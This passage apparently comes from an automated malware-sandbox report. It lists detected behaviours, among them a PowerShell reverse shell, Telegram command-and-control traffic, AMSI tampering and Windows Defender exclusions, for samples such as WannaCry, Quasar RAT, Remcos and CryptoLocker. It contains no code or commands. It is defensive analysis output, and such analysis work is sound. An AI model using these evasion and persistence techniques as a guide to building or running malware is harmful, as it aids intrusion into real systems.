  - Axam.exe (PID: 10648)
  - attrib.exe (PID: 7796)
  - Axam.exe (PID: 1932)
  - cmd.exe (PID: 9924)
  - Axam.exe (PID: 13752)
  - Axam.exe (PID: 13840)
  - Axam.exe (PID: 13628)
  - attrib.exe (PID: 9624)
  - WannaCry.exe (PID: 12312)
  - epic.exe (PID: 15268)
  - Axam.exe (PID: 11620)
  - Axam.exe (PID: 14868)
  - Axam.exe (PID: 5540)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 14196)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 12476)
  - Axam.exe (PID: 15188)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 10536)
  - Axam.exe (PID: 15532)
- Working with threads in the GNU C Compiler (GCC) libraries related mutex has been found
  - hersey.exe (PID: 11632)
  - porn.exe (PID: 12488)
- Uses ATTRIB.EXE to modify file attributes
  - f.exe (PID: 9940)
  - werefult.exe (PID: 10260)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - cmd.exe (PID: 9924)
  - cmd.exe (PID: 2804)
- Starts a Microsoft application from unusual location
  - WannaCry.exe (PID: 12312)
  - !WannaDecryptor!.exe (PID: 13500)
- Mutex name with non-standard characters
  - Setup.exe (PID: 9444)
  - epic.exe (PID: 15268)
- Possible Social Engineering Attempted
  - svchost.exe (PID: 2200)
- Crypto Currency Mining Activity Detected
  - main.exe (PID: 3780)
- Suspicious use of NETSH.EXE
  - explorer.exe (PID: 4772)
- Script adds exclusion path to Windows Defender
  - Crypt.exe (PID: 7256)
- Checks for external IP
  - sFFG7Wg.exe (PID: 3880)
  - svchost.exe (PID: 2200)
  - mexx.exe (PID: 8964)
  - svchost.exe (PID: 11896)
  - Crypt.exe (PID: 7256)
  - quasarat.exe (PID: 12440)
  - MARCUSS.exe (PID: 12728)
  - installs.exe (PID: 7988)
  - quasarat.exe (PID: 7500)
  - powershell.exe (PID: 9324)
  - quasarat.exe (PID: 16088)
- The process executes VB scripts
  - remcos_a.exe (PID: 12348)
  - cmd.exe (PID: 12884)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)
  - mexx.exe (PID: 8964)
  - MSBuild.exe (PID: 8500)
- Creates FileSystem object to access computer's file system (SCRIPT)
  - wscript.exe (PID: 9372)
- Runs shell command (SCRIPT)
  - wscript.exe (PID: 9372)
- Gets full path of the running script (SCRIPT)
  - wscript.exe (PID: 9372)
- Drops 7-zip archiver for unpacking
  - cabal.exe (PID: 11608)
- The process verifies whether the antivirus software is installed
  - mexx.exe (PID: 8964)
  - cmd.exe (PID: 13004)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 6572)
  - Helper.exe (PID: 7784)
  - powershell.exe (PID: 9012)
  - powershell.exe (PID: 9324)
  - powershell.exe (PID: 10276)
  - powershell.exe (PID: 15136)
  - powershell.exe (PID: 13360)
  - powershell.exe (PID: 10716)
  - powershell.exe (PID: 7632)
  - powershell.exe (PID: 15328)
  - powershell.exe (PID: 7660)
  - powershell.exe (PID: 15668)
  - powershell.exe (PID: 16056)
  - powershell.exe (PID: 11564)
  - powershell.exe (PID: 1212)
  - powershell.exe (PID: 10480)
  - powershell.exe (PID: 13336)
  - powershell.exe (PID: 13556)
  - powershell.exe (PID: 12512)
  - powershell.exe (PID: 7108)
  - powershell.exe (PID: 9960)
- Uses REG/REGEDIT.EXE to modify registry
  - cmd.exe (PID: 12660)
  - cmd.exe (PID: 9924)
- Uses sleep to delay execution (POWERSHELL)
  - Helper.exe (PID: 7784)
- Checks a user's role membership (POWERSHELL)
  - Helper.exe (PID: 7784)
  - powershell.exe (PID: 9324)
- Starts a new process with hidden mode (POWERSHELL)
  - Helper.exe (PID: 7784)
- Searches for installed software
  - MSBuild.exe (PID: 8500)
- Base64-obfuscated command line is found
  - MSBuild.exe (PID: 8500)
  - Monotone.exe (PID: 1036)
  - TempSpoofer.exe (PID: 1128)
  - TempSpoofer.exe (PID: 1392)
  - UniversalSpoofer.exe (PID: 8044)
  - Monotone.exe (PID: 6892)
  - TempSpoofer.exe (PID: 6292)
  - TempSpoofer.exe (PID: 4044)
- The process bypasses the loading of PowerShell profile settings
  - MSBuild.exe (PID: 8500)
  - powershell.exe (PID: 7956)
  - werefult.exe (PID: 10260)
- The process hide an interactive prompt from the user
  - MSBuild.exe (PID: 8500)
  - powershell.exe (PID: 7956)
- Uses TASKKILL.EXE to kill process
  - WannaCry.exe (PID: 12312)
- BASE64 encoded PowerShell command has been detected
  - MSBuild.exe (PID: 8500)
  - TempSpoofer.exe (PID: 1128)
  - UniversalSpoofer.exe (PID: 8044)
  - Monotone.exe (PID: 1036)
  - Monotone.exe (PID: 6892)
  - TempSpoofer.exe (PID: 1392)
  - TempSpoofer.exe (PID: 4044)
  - TempSpoofer.exe (PID: 6292)
- Contacting a server suspected of hosting an CnC
  - foncar.exe (PID: 11668)
  - dumer.exe (PID: 13928)
  - gaved.exe (PID: 14316)
  - explorer.exe (PID: 4772)
- The process executes via Task Scheduler
  - dumer.exe (PID: 13928)
  - gaved.exe (PID: 14316)
- Connects to FTP
  - MARCUSS.exe (PID: 12728)
- Uses TIMEOUT.EXE to delay execution
  - cmd.exe (PID: 8784)
  - cmd.exe (PID: 2804)
- Executes script without checking the security policy
  - powershell.exe (PID: 13984)
- Potential TCP-based PowerShell reverse shell connection
  - powershell.exe (PID: 7956)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 6572)
  - powershell.exe (PID: 10276)
- Possibly malicious use of IEX has been detected
  - powershell.exe (PID: 7956)
- Found IP address in command line
  - powershell.exe (PID: 13984)
- The executable file from the user directory is run by the CMD process
  - epic.exe (PID: 15268)
  - quasarat.exe (PID: 7500)
  - quasarat.exe (PID: 16088)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 9656)
  - cmd.exe (PID: 9912)
  - cmd.exe (PID: 8580)
  - cmd.exe (PID: 2116)
- Starts application with an unusual extension
  - cmd.exe (PID: 9656)
  - cmd.exe (PID: 8580)
  - cmd.exe (PID: 2116)
- Searches and executes a command on selected files
  - forfiles.exe (PID: 15100)
  - forfiles.exe (PID: 12568)
  - forfiles.exe (PID: 10620)
- Gets or sets the security protocol (POWERSHELL)
  - powershell.exe (PID: 9324)
- Gets path to any of the special folders (POWERSHELL)
  - powershell.exe (PID: 9604)
- Creates new GUID (POWERSHELL)
  - powershell.exe (PID: 9604)
  - powershell.exe (PID: 9324)
- CSC.EXE is used to compile C# code
  - csc.exe (PID: 8448)
  - csc.exe (PID: 13716)
  - csc.exe (PID: 10812)
  - csc.exe (PID: 14796)
  - csc.exe (PID: 11096)
  - csc.exe (PID: 5372)
  - csc.exe (PID: 15012)
  - csc.exe (PID: 13760)
  - csc.exe (PID: 11364)
  - csc.exe (PID: 3668)
  - csc.exe (PID: 7868)
  - csc.exe (PID: 11784)
  - csc.exe (PID: 8624)
  - csc.exe (PID: 14656)
  - csc.exe (PID: 15212)
  - csc.exe (PID: 11464)
  - csc.exe (PID: 10368)
  - csc.exe (PID: 11960)
  - csc.exe (PID: 12968)
- Changes AMSI initialization state that disables detection systems (POWERSHELL)
  - powershell.exe (PID: 9324)
- Reads the date of Windows installation
  - ganja5.exe (PID: 12704)
  - Helper.exe (PID: 7784)
  - dw20.exe (PID: 7664)
- Adds/modifies Windows certificates
  - powershell.exe (PID: 10364)
  - powershell.exe (PID: 11584)
- Executes as Windows Service
  - VSSVC.exe (PID: 15252)
- Gets file extension (POWERSHELL)
  - powershell.exe (PID: 9604)
- Get information on the list of running processes
  - f.exe (PID: 9940)
  - werefult.exe (PID: 10260)
- Executes application which crashes
  - powershell.exe (PID: 10356)
  - installs.exe (PID: 7988)
- Starts process via Powershell
  - powershell.exe (PID: 15808)
- Gets content of a file (POWERSHELL)
  - powershell.exe (PID: 15136)
  - powershell.exe (PID: 13360)
  - powershell.exe (PID: 7632)
  - powershell.exe (PID: 10716)
  - powershell.exe (PID: 15328)
  - powershell.exe (PID: 7660)
  - powershell.exe (PID: 16056)
  - powershell.exe (PID: 15668)
  - powershell.exe (PID: 11564)
  - powershell.exe (PID: 1212)
  - powershell.exe (PID: 12512)
  - powershell.exe (PID: 7108)
  - powershell.exe (PID: 13336)
  - powershell.exe (PID: 13556)
  - powershell.exe (PID: 9960)
- Process uses IPCONFIG to clear DNS cache
  - Helper.exe (PID: 7784)
- Converts a string into array of characters (POWERSHELL)
  - powershell.exe (PID: 10480)
- Reads the Windows owner or organization settings
  - msiexec.exe (PID: 11180)
- Reverses array data (POWERSHELL)
  - powershell.exe (PID: 10480)
INFO
- Checks supported languages
  - main.exe (PID: 7100)
  - main.exe (PID: 3780)
  - sFFG7Wg.exe (PID: 3880)
  - TempSpoofer.exe (PID: 1392)
  - TempSpoofer.exe (PID: 6292)
  - Monotone.exe (PID: 6892)
  - Monotone.exe (PID: 1036)
  - TempSpoofer.exe (PID: 4044)
  - TempSpoofer.exe (PID: 1128)
  - VXHDH.exe (PID: 1612)
  - my%20file.exe (PID: 2180)
  - T.exe (PID: 7176)
  - donie30.exe (PID: 684)
  - Crypt.exe (PID: 7256)
  - Helper.exe (PID: 7784)
  - dumer.exe (PID: 7376)
  - bot.exe (PID: 7284)
  - bravo29.exe (PID: 7248)
  - XClient.exe (PID: 8016)
  - installs.exe (PID: 7988)
  - UniversalSpoofer.exe (PID: 8044)
  - Worldofficee.exe (PID: 7528)
  - Worldoffice.exe (PID: 8352)
  - loader.exe (PID: 8524)
  - gaved.exe (PID: 8476)
  - startud.exe (PID: 8588)
  - payload.exe (PID: 8956)
  - ap.exe (PID: 8948)
  - CryptoWall.exe (PID: 9480)
  - tcp_windows_amd64.exe (PID: 8932)
  - Setup.exe (PID: 9444)
  - Prolin.exe (PID: 9308)
  - Ganja54.exe (PID: 9172)
  - WxWorkMultiOpen.exe (PID: 8980)
  - f.exe (PID: 9940)
  - demon.exe (PID: 10380)
  - WindowsUpdateLauncher.exe (PID: 9408)
  - lollo.exe (PID: 8504)
  - WxWorkMultiOpen.exe (PID: 8988)
  - WxWorkMultiOpen.exe (PID: 8972)
  - test1.exe (PID: 9436)
  - javaw.exe (PID: 10284)
  - runtimebroker.exe (PID: 10316)
  - Amus.exe (PID: 10348)
  - syspool.exe (PID: 10340)
  - CryptoLocker.exe (PID: 10300)
  - mexx.exe (PID: 8964)
  - https.exe (PID: 11108)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10860)
  - Bugsoft.exe (PID: 11116)
  - Ganja99.exe (PID: 1760)
  - allonymouslyfFpY.exe (PID: 11220)
  - Anap.a.exe (PID: 9480)
  - vshell.exe (PID: 8476)
  - msconfig.exe (PID: 3584)
  - baboon.exe (PID: 684)
  - Ganja90.exe (PID: 11624)
  - werefult.exe (PID: 10260)
  - LOIC.exe (PID: 11212)
  - Ganja121.exe (PID: 11676)
  - Axam.a.exe (PID: 640)
  - windowsupdatetimer.exe (PID: 11692)
  - Clien123.exe (PID: 9504)
  - L2.exe (PID: 11140)
  - foncar.exe (PID: 11668)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - Ganja35.exe (PID: 11616)
  - installer.exe (PID: 10332)
  - Ganja176.exe (PID: 11648)
  - v999f8.exe (PID: 11936)
  - march.exe (PID: 11132)
  - 4De3.exe (PID: 12168)
  - lol.exe (PID: 11928)
  - cabal.exe (PID: 11608)
  - tomcat8.exe (PID: 9340)
  - ls.exe (PID: 12144)
  - klass.exe (PID: 9172)
  - c1.exe (PID: 12380)
  - demonx64.exe (PID: 12340)
  - your_app.exe (PID: 12364)
  - remcos_a.exe (PID: 12348)
  - Ganja177.exe (PID: 12472)
  - WannaCry.exe (PID: 12312)
  - quasarat.exe (PID: 12440)
  - dp.exe (PID: 10372)
  - MARCUSS.exe (PID: 12728)
  - Ganja180.exe (PID: 12448)
  - cc.exe (PID: 12764)
  - svchost.exe (PID: 12696)
  - discord.exe (PID: 12752)
  - nbin22.exe (PID: 12412)
  - porn.exe (PID: 12488)
  - winxclient.exe (PID: 12328)
  - hersey.exe (PID: 11632)
  - klass.exe (PID: 12544)
  - DumpAADUserPRT.exe (PID: 11684)
  - ganja5.exe (PID: 12704)
  - agent.exe (PID: 9800)
  - esp32.exe (PID: 11988)
  - Doppelganger.exe (PID: 10308)
  - ls.exe (PID: 12980)
  - moi.exe (PID: 11704)
  - Ganja190.exe (PID: 12720)
  - Whisker.exe (PID: 12420)
  - Adobe.exe (PID: 10656)
  - Setup.exe (PID: 13192)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 12832)
  - RegAsm.exe (PID: 8216)
  - Axam.exe (PID: 8716)
  - esp.exe (PID: 12372)
  - MSBuild.exe (PID: 8500)
  - rickroll.exe (PID: 11124)
  - msiexec.exe (PID: 11180)
  - Axam.exe (PID: 7236)
  - Axam.exe (PID: 12536)
  - Axam.exe (PID: 9360)
  - Axam.exe (PID: 9452)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - Axam.exe (PID: 7600)
  - Axam.exe (PID: 10648)
  - Axam.exe (PID: 1932)
  - !WannaDecryptor!.exe (PID: 13500)
  - Axam.exe (PID: 13840)
  - dumer.exe (PID: 13928)
  - Axam.exe (PID: 13628)
  - Axam.exe (PID: 13752)
  - gaved.exe (PID: 14316)
  - ShellExperienceHost.exe (PID: 13552)
  - chcp.com (PID: 15092)
  - epic.exe (PID: 15268)
  - csc.exe (PID: 8448)
  - Axam.exe (PID: 11620)
  - Axam.exe (PID: 14868)
  - Axam.exe (PID: 5540)
  - csc.exe (PID: 13716)
  - cvtres.exe (PID: 12548)
  - quasarat.exe (PID: 7500)
  - cvtres.exe (PID: 2140)
  - cvtres.exe (PID: 12352)
  - csc.exe (PID: 10812)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 14196)
  - Axam.exe (PID: 12476)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 15188)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 10536)
  - chcp.com (PID: 16372)
  - Axam.exe (PID: 15972)
  - Axam.exe (PID: 15924)
  - Axam.exe (PID: 12668)
  - Axam.exe (PID: 15584)
  - Axam.exe (PID: 12180)
  - Axam.exe (PID: 15988)
  - Axam.exe (PID: 15532)
  - cvtres.exe (PID: 15424)
  - csc.exe (PID: 11096)
  - csc.exe (PID: 14796)
  - cvtres.exe (PID: 8728)
  - Axam.exe (PID: 1760)
  - quasarat.exe (PID: 16088)
  - dw20.exe (PID: 7664)
  - cvtres.exe (PID: 3968)
  - csc.exe (PID: 5372)
  - csc.exe (PID: 13760)
  - cvtres.exe (PID: 15964)
  - csc.exe (PID: 15012)
  - cvtres.exe (PID: 9788)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 15712)
  - csc.exe (PID: 11364)
  - cvtres.exe (PID: 11392)
  - cvtres.exe (PID: 15300)
  - csc.exe (PID: 3668)
  - csc.exe (PID: 11784)
  - csc.exe (PID: 7868)
  - cvtres.exe (PID: 11008)
  - csc.exe (PID: 8624)
  - csc.exe (PID: 14656)
  - chcp.com (PID: 6424)
  - cvtres.exe (PID: 4580)
  - cvtres.exe (PID: 7208)
  - cvtres.exe (PID: 15684)
  - csc.exe (PID: 11960)
  - csc.exe (PID: 11464)
  - csc.exe (PID: 15212)
  - msiexec.exe (PID: 15180)
  - cvtres.exe (PID: 1936)
  - csc.exe (PID: 12968)
  - csc.exe (PID: 10368)
  - cvtres.exe (PID: 11976)
  - cvtres.exe (PID: 3580)
  - cvtres.exe (PID: 7468)
  - cvtres.exe (PID: 9708)
- Reads the computer name
  - main.exe (PID: 7100)
  - main.exe (PID: 3780)
  - sFFG7Wg.exe (PID: 3880)
  - Monotone.exe (PID: 1036)
  - TempSpoofer.exe (PID: 4044)
  - TempSpoofer.exe (PID: 1128)
  - TempSpoofer.exe (PID: 6292)
  - TempSpoofer.exe (PID: 1392)
  - Monotone.exe (PID: 6892)
  - donie30.exe (PID: 684)
  - bravo29.exe (PID: 7248)
  - Crypt.exe (PID: 7256)
  - my%20file.exe (PID: 2180)
  - T.exe (PID: 7176)
  - Helper.exe (PID: 7784)
  - VXHDH.exe (PID: 1612)
  - XClient.exe (PID: 8016)
  - installs.exe (PID: 7988)
  - UniversalSpoofer.exe (PID: 8044)
  - ap.exe (PID: 8948)
  - mexx.exe (PID: 8964)
  - tcp_windows_amd64.exe (PID: 8932)
  - startud.exe (PID: 8588)
  - WxWorkMultiOpen.exe (PID: 8980)
  - Setup.exe (PID: 9444)
  - WxWorkMultiOpen.exe (PID: 8988)
  - WxWorkMultiOpen.exe (PID: 8972)
  - javaw.exe (PID: 10284)
  - Ganja99.exe (PID: 1760)
  - syspool.exe (PID: 10340)
  - https.exe (PID: 11108)
  - allonymouslyfFpY.exe (PID: 11220)
  - CryptoLocker.exe (PID: 10300)
  - vshell.exe (PID: 8476)
  - msconfig.exe (PID: 3584)
  - Prolin.exe (PID: 9308)
  - test1.exe (PID: 9436)
  - Ganja90.exe (PID: 11624)
  - installer.exe (PID: 10332)
  - Ganja35.exe (PID: 11616)
  - Ganja176.exe (PID: 11648)
  - Amus.exe (PID: 10348)
  - foncar.exe (PID: 11668)
  - march.exe (PID: 11132)
  - LOIC.exe (PID: 11212)
  - Clien123.exe (PID: 9504)
  - hersey.exe (PID: 11632)
  - baboon.exe (PID: 684)
  - ls.exe (PID: 12144)
  - klass.exe (PID: 9172)
  - cabal.exe (PID: 11608)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - Ganja177.exe (PID: 12472)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - WannaCry.exe (PID: 12312)
  - L2.exe (PID: 11140)
  - Bugsoft.exe (PID: 11116)
  - MARCUSS.exe (PID: 12728)
  - cc.exe (PID: 12764)
  - svchost.exe (PID: 12696)
  - quasarat.exe (PID: 12440)
  - discord.exe (PID: 12752)
  - nbin22.exe (PID: 12412)
  - 4De3.exe (PID: 12168)
  - porn.exe (PID: 12488)
  - Axam.a.exe (PID: 640)
  - klass.exe (PID: 12544)
  - lol.exe (PID: 11928)
  - ls.exe (PID: 12980)
  - demonx64.exe (PID: 12340)
  - Ganja190.exe (PID: 12720)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 12832)
  - Adobe.exe (PID: 10656)
  - Whisker.exe (PID: 12420)
  - DumpAADUserPRT.exe (PID: 11684)
  - remcos_a.exe (PID: 12348)
  - RegAsm.exe (PID: 8216)
  - Doppelganger.exe (PID: 10308)
  - c1.exe (PID: 12380)
  - MSBuild.exe (PID: 8500)
  - your_app.exe (PID: 12364)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10860)
  - msiexec.exe (PID: 11180)
  - dp.exe (PID: 10372)
  - ganja5.exe (PID: 12704)
  - Axam.exe (PID: 8716)
  - Axam.exe (PID: 7236)
  - Axam.exe (PID: 9360)
  - Axam.exe (PID: 9452)
  - Axam.exe (PID: 12536)
  - loader.exe (PID: 8524)
  - Axam.exe (PID: 7600)
  - Axam.exe (PID: 10648)
  - Axam.exe (PID: 1932)
  - dumer.exe (PID: 13928)
  - !WannaDecryptor!.exe (PID: 13500)
  - Axam.exe (PID: 13840)
  - gaved.exe (PID: 14316)
  - Axam.exe (PID: 13752)
  - Axam.exe (PID: 13628)
  - ShellExperienceHost.exe (PID: 13552)
  - epic.exe (PID: 15268)
  - Axam.exe (PID: 11620)
  - Setup.exe (PID: 13192)
  - Axam.exe (PID: 5540)
  - quasarat.exe (PID: 7500)
  - Axam.exe (PID: 14196)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 15188)
  - Axam.exe (PID: 12476)
  - Axam.exe (PID: 10536)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 15924)
  - Axam.exe (PID: 15972)
  - Axam.exe (PID: 12668)
  - Axam.exe (PID: 15584)
  - Axam.exe (PID: 12180)
  - Axam.exe (PID: 15988)
  - Axam.exe (PID: 15532)
  - quasarat.exe (PID: 16088)
  - Axam.exe (PID: 1760)
  - dw20.exe (PID: 7664)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 15712)
  - msiexec.exe (PID: 15180)
- The sample compiled with english language support
  - main.exe (PID: 7100)
  - main.exe (PID: 3780)
  - Setup.exe (PID: 9444)
  - Prolin.exe (PID: 9308)
  - WannaCry.exe (PID: 12312)
  - Amus.exe (PID: 10348)
  - Axam.a.exe (PID: 640)
  - cabal.exe (PID: 11608)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
- Create files in a temporary directory
  - main.exe (PID: 7100)
  - main.exe (PID: 3780)
  - TempSpoofer.exe (PID: 1128)
  - Monotone.exe (PID: 1036)
  - TempSpoofer.exe (PID: 1392)
  - Monotone.exe (PID: 6892)
  - TempSpoofer.exe (PID: 4044)
  - TempSpoofer.exe (PID: 6292)
  - donie30.exe (PID: 684)
  - bravo29.exe (PID: 7248)
  - Helper.exe (PID: 7784)
  - UniversalSpoofer.exe (PID: 8044)
  - Setup.exe (PID: 9444)
  - vshell.exe (PID: 8476)
  - Amus.exe (PID: 10348)
  - Prolin.exe (PID: 9308)
  - Bugsoft.exe (PID: 11116)
  - msconfig.exe (PID: 3584)
  - Axam.a.exe (PID: 640)
  - remcos_a.exe (PID: 12348)
  - WannaCry.exe (PID: 12312)
  - hersey.exe (PID: 11632)
  - cabal.exe (PID: 11608)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10860)
  - your_app.exe (PID: 12364)
  - 4De3.exe (PID: 12168)
  - Axam.exe (PID: 8716)
  - c1.exe (PID: 12380)
  - Axam.exe (PID: 7236)
  - Axam.exe (PID: 12536)
  - discord.exe (PID: 12752)
  - Axam.exe (PID: 9360)
  - Axam.exe (PID: 9452)
  - agent.exe (PID: 9800)
  - Axam.exe (PID: 7600)
  - quasarat.exe (PID: 12440)
  - Axam.exe (PID: 10648)
  - cscript.exe (PID: 9844)
  - Axam.exe (PID: 1932)
  - MSBuild.exe (PID: 8500)
  - ap.exe (PID: 8948)
  - Axam.exe (PID: 13752)
  - Axam.exe (PID: 13840)
  - Axam.exe (PID: 13628)
  - epic.exe (PID: 15268)
  - powershell.exe (PID: 13360)
  - Axam.exe (PID: 11620)
  - Axam.exe (PID: 5540)
  - Axam.exe (PID: 14868)
  - cvtres.exe (PID: 12548)
  - csc.exe (PID: 8448)
  - csc.exe (PID: 13716)
  - powershell.exe (PID: 10716)
  - cvtres.exe (PID: 2140)
  - powershell.exe (PID: 15136)
  - csc.exe (PID: 10812)
  - powershell.exe (PID: 15328)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 12476)
  - powershell.exe (PID: 7632)
  - cvtres.exe (PID: 12352)
  - Axam.exe (PID: 14196)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 10536)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 15188)
  - quasarat.exe (PID: 7500)
  - powershell.exe (PID: 7660)
  - powershell.exe (PID: 15668)
  - powershell.exe (PID: 16056)
  - Axam.exe (PID: 15972)
  - Axam.exe (PID: 15924)
  - Axam.exe (PID: 15584)
  - Axam.exe (PID: 12668)
  - powershell.exe (PID: 11564)
  - cvtres.exe (PID: 15424)
  - csc.exe (PID: 14796)
  - powershell.exe (PID: 7108)
  - Axam.exe (PID: 1760)
  - powershell.exe (PID: 13556)
  - csc.exe (PID: 13760)
  - cvtres.exe (PID: 15964)
  - quasarat.exe (PID: 16088)
  - csc.exe (PID: 3668)
  - csc.exe (PID: 11784)
  - csc.exe (PID: 7868)
  - cvtres.exe (PID: 15300)
  - csc.exe (PID: 11364)
  - installs.exe (PID: 7988)
  - powershell.exe (PID: 1212)
  - werefult.exe (PID: 10260)
  - cvtres.exe (PID: 4580)
  - cvtres.exe (PID: 11008)
  - csc.exe (PID: 14656)
  - csc.exe (PID: 8624)
  - cvtres.exe (PID: 7208)
  - cvtres.exe (PID: 15684)
  - powershell.exe (PID: 12512)
  - powershell.exe (PID: 13336)
  - powershell.exe (PID: 9960)
  - csc.exe (PID: 12968)
  - csc.exe (PID: 15212)
  - csc.exe (PID: 11464)
- Checks proxy server information
  - main.exe (PID: 3780)
  - sFFG7Wg.exe (PID: 3880)
  - demon.exe (PID: 10380)
  - https.exe (PID: 11108)
  - mexx.exe (PID: 8964)
  - baboon.exe (PID: 684)
  - march.exe (PID: 11132)
  - demonx64.exe (PID: 12340)
  - VXHDH.exe (PID: 1612)
  - svchost.exe (PID: 12696)
  - L2.exe (PID: 11140)
  - svchost.exe (PID: 11896)
  - cabal.exe (PID: 11608)
  - quasarat.exe (PID: 12440)
  - MSBuild.exe (PID: 8500)
  - MARCUSS.exe (PID: 12728)
  - ganja5.exe (PID: 12704)
  - dumer.exe (PID: 13928)
  - gaved.exe (PID: 14316)
  - installs.exe (PID: 7988)
  - powershell.exe (PID: 9760)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 10364)
  - powershell.exe (PID: 10396)
  - quasarat.exe (PID: 7500)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
  - powershell.exe (PID: 9324)
  - WerFault.exe (PID: 7684)
  - quasarat.exe (PID: 16088)
  - dw20.exe (PID: 7664)
- Reads security settings of Internet Explorer
  - Taskmgr.exe (PID: 5116)
  - svchost.exe (PID: 11896)
  - cscript.exe (PID: 9844)
  - explorer.exe (PID: 4772)
  - powershell.exe (PID: 13360)
  - powershell.exe (PID: 15136)
  - powershell.exe (PID: 10716)
  - powershell.exe (PID: 15328)
  - powershell.exe (PID: 7632)
  - powershell.exe (PID: 7660)
  - powershell.exe (PID: 15668)
  - powershell.exe (PID: 16056)
  - powershell.exe (PID: 11564)
  - powershell.exe (PID: 1212)
  - powershell.exe (PID: 7108)
  - powershell.exe (PID: 13336)
  - powershell.exe (PID: 9960)
  - powershell.exe (PID: 13556)
  - powershell.exe (PID: 12512)
- Reads the machine GUID from the registry
  - Monotone.exe (PID: 1036)
  - TempSpoofer.exe (PID: 1128)
  - TempSpoofer.exe (PID: 1392)
  - TempSpoofer.exe (PID: 4044)
  - TempSpoofer.exe (PID: 6292)
  - Monotone.exe (PID: 6892)
  - my%20file.exe (PID: 2180)
  - sFFG7Wg.exe (PID: 3880)
  - T.exe (PID: 7176)
  - Helper.exe (PID: 7784)
  - UniversalSpoofer.exe (PID: 8044)
  - CryptoWall.exe (PID: 9480)
  - ap.exe (PID: 8948)
  - VXHDH.exe (PID: 1612)
  - mexx.exe (PID: 8964)
  - javaw.exe (PID: 10284)
  - startud.exe (PID: 8588)
  - L2.exe (PID: 11140)
  - installs.exe (PID: 7988)
  - XClient.exe (PID: 8016)
  - LOIC.exe (PID: 11212)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - Amus.exe (PID: 10348)
  - WannaCry.exe (PID: 12312)
  - cc.exe (PID: 12764)
  - cabal.exe (PID: 11608)
  - MARCUSS.exe (PID: 12728)
  - quasarat.exe (PID: 12440)
  - foncar.exe (PID: 11668)
  - Clien123.exe (PID: 9504)
  - discord.exe (PID: 12752)
  - RegAsm.exe (PID: 8216)
  - c1.exe (PID: 12380)
  - Crypt.exe (PID: 7256)
  - dp.exe (PID: 10372)
  - ganja5.exe (PID: 12704)
  - MSBuild.exe (PID: 8500)
  - csc.exe (PID: 8448)
  - quasarat.exe (PID: 7500)
  - csc.exe (PID: 13716)
  - csc.exe (PID: 10812)
  - csc.exe (PID: 11096)
  - csc.exe (PID: 14796)
  - dw20.exe (PID: 7664)
  - quasarat.exe (PID: 16088)
  - csc.exe (PID: 5372)
  - csc.exe (PID: 15012)
  - csc.exe (PID: 13760)
  - csc.exe (PID: 11364)
  - csc.exe (PID: 3668)
  - csc.exe (PID: 7868)
  - csc.exe (PID: 11784)
  - csc.exe (PID: 8624)
  - csc.exe (PID: 14656)
  - csc.exe (PID: 12968)
  - csc.exe (PID: 11464)
  - csc.exe (PID: 15212)
  - csc.exe (PID: 10368)
  - csc.exe (PID: 11960)
  - msiexec.exe (PID: 15180)
- Creates files or folders in the user directory
  - Taskmgr.exe (PID: 5116)
  - my%20file.exe (PID: 2180)
  - sFFG7Wg.exe (PID: 3880)
  - loader.exe (PID: 8524)
  - Ganja54.exe (PID: 9172)
  - explorer.exe (PID: 9696)
  - test1.exe (PID: 9436)
  - syspool.exe (PID: 10340)
  - CryptoLocker.exe (PID: 10300)
  - lol.exe (PID: 11928)
  - Amus.exe (PID: 10348)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - Axam.a.exe (PID: 640)
  - explorer.exe (PID: 4772)
  - discord.exe (PID: 12752)
  - MSBuild.exe (PID: 8500)
  - f.exe (PID: 9940)
  - WannaCry.exe (PID: 12312)
  - ap.exe (PID: 8948)
  - werefult.exe (PID: 10260)
  - installer.exe (PID: 10332)
- Reads the software policy settings
  - sFFG7Wg.exe (PID: 3880)
  - mexx.exe (PID: 8964)
  - MSBuild.exe (PID: 8500)
  - foncar.exe (PID: 11668)
  - powershell.exe (PID: 13360)
  - Helper.exe (PID: 7784)
  - powershell.exe (PID: 10716)
